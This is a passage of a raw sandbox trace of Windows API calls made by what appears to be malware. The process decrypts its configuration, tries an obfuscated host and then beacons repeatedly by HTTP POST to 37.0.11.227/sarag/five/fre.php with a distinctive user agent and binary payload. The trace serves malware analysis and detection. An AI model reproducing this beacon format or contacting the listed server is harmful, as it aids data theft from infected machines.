(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.899] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.903] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.908] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.909] GetProcessHeap () returned 0x690000 [0292.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0292.909] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.909] GetProcessHeap () returned 0x690000 [0292.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0292.910] GetProcessHeap () returned 0x690000 [0292.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0292.910] GetProcessHeap () returned 0x690000 [0292.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0292.913] GetProcessHeap () returned 0x690000 [0292.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0292.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0292.931] GetProcessHeap () returned 0x690000 [0292.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0292.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.932] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0292.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.933] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.935] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.935] GetProcessHeap () returned 0x690000 [0292.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0292.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.937] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0292.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.938] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0292.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0292.939] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0292.939] GetProcessHeap () returned 0x690000 [0292.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0292.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.940] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0292.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.941] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0292.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.942] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0292.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.943] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0292.943] GetProcessHeap () returned 0x690000 [0292.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0292.944] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0292.946] GetProcessHeap () returned 0x690000 [0292.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0292.947] socket (af=2, type=1, protocol=6) returned 0x968 [0292.947] connect (s=0x968, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0292.975] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0292.975] GetProcessHeap () returned 0x690000 [0292.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0292.975] GetProcessHeap () returned 0x690000 [0292.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0292.976] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.978] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.978] GetProcessHeap () returned 0x690000 [0292.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0292.978] GetProcessHeap () returned 0x690000 [0292.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.978] GetProcessHeap () returned 0x690000 [0292.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0292.978] GetProcessHeap () returned 0x690000 [0292.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0292.979] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0292.980] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.980] GetProcessHeap () returned 0x690000 [0292.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0292.980] GetProcessHeap () returned 0x690000 [0292.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0292.981] send (s=0x968, buf=0x6ad508*, len=242, flags=0) returned 242 [0292.981] send (s=0x968, buf=0x6aba40*, len=159, flags=0) returned 159 [0292.982] GetProcessHeap () returned 0x690000 [0292.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0292.982] recv (in: s=0x968, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0293.056] GetProcessHeap () returned 0x690000 [0293.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0293.056] GetProcessHeap () returned 0x690000 [0293.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.057] GetProcessHeap () returned 0x690000 [0293.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0293.058] GetProcessHeap () returned 0x690000 [0293.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0293.058] closesocket (s=0x968) returned 0 [0293.059] GetProcessHeap () returned 0x690000 [0293.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0293.059] GetProcessHeap () returned 0x690000 [0293.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.059] GetProcessHeap () returned 0x690000 [0293.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0293.059] GetProcessHeap () returned 0x690000 [0293.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0293.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d4) returned 0x968 [0293.061] Sleep (dwMilliseconds=0xea60) [0293.063] GetProcessHeap () returned 0x690000 [0293.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0293.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0293.091] GetProcessHeap () returned 0x690000 [0293.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0293.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.093] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.094] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.095] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.095] GetProcessHeap () returned 0x690000 [0293.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0293.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.097] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0293.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.098] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.099] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0293.099] GetProcessHeap () returned 0x690000 [0293.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0293.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.100] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.101] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.105] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.106] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.106] GetProcessHeap () returned 0x690000 [0293.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0293.106] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.106] GetProcessHeap () returned 0x690000 [0293.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0293.107] GetProcessHeap () returned 0x690000 [0293.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0293.107] GetProcessHeap () returned 0x690000 [0293.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.107] GetProcessHeap () returned 0x690000 [0293.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0293.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.108] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0293.121] GetProcessHeap () returned 0x690000 [0293.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0293.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.121] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.122] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.123] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.123] GetProcessHeap () returned 0x690000 [0293.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0293.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.124] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0293.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.125] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.126] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0293.126] GetProcessHeap () returned 0x690000 [0293.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.127] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0293.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.128] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0293.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.129] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0293.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0293.131] GetProcessHeap () returned 0x690000 [0293.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0293.131] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0293.131] GetProcessHeap () returned 0x690000 [0293.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0293.131] socket (af=2, type=1, protocol=6) returned 0x96c [0293.132] connect (s=0x96c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0293.154] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0293.154] GetProcessHeap () returned 0x690000 [0293.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0293.155] GetProcessHeap () returned 0x690000 [0293.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0293.155] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.156] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.156] GetProcessHeap () returned 0x690000 [0293.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0293.156] GetProcessHeap () returned 0x690000 [0293.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.157] GetProcessHeap () returned 0x690000 [0293.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0293.157] GetProcessHeap () returned 0x690000 [0293.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0293.157] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.158] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.158] GetProcessHeap () returned 0x690000 [0293.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0293.158] GetProcessHeap () returned 0x690000 [0293.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.159] send (s=0x96c, buf=0x6ad508*, len=242, flags=0) returned 242 [0293.159] send (s=0x96c, buf=0x6aba40*, len=159, flags=0) returned 159 [0293.159] GetProcessHeap () returned 0x690000 [0293.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0293.159] recv (in: s=0x96c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0293.250] GetProcessHeap () returned 0x690000 [0293.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0293.251] GetProcessHeap () returned 0x690000 [0293.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0293.254] GetProcessHeap () returned 0x690000 [0293.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0293.254] GetProcessHeap () returned 0x690000 [0293.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0293.255] closesocket (s=0x96c) returned 0 [0293.255] GetProcessHeap () returned 0x690000 [0293.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0293.255] GetProcessHeap () returned 0x690000 [0293.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.256] GetProcessHeap () returned 0x690000 [0293.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.256] GetProcessHeap () returned 0x690000 [0293.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0293.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d8) returned 0x96c [0293.258] Sleep (dwMilliseconds=0xea60) [0293.259] GetProcessHeap () returned 0x690000 [0293.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0293.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0293.276] GetProcessHeap () returned 0x690000 [0293.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0293.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.277] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.277] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.278] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.278] GetProcessHeap () returned 0x690000 [0293.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0293.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.280] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0293.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.281] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.281] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0293.281] GetProcessHeap () returned 0x690000 [0293.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0293.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.288] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.289] GetProcessHeap () returned 0x690000 [0293.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0293.289] getaddrinfo (in: 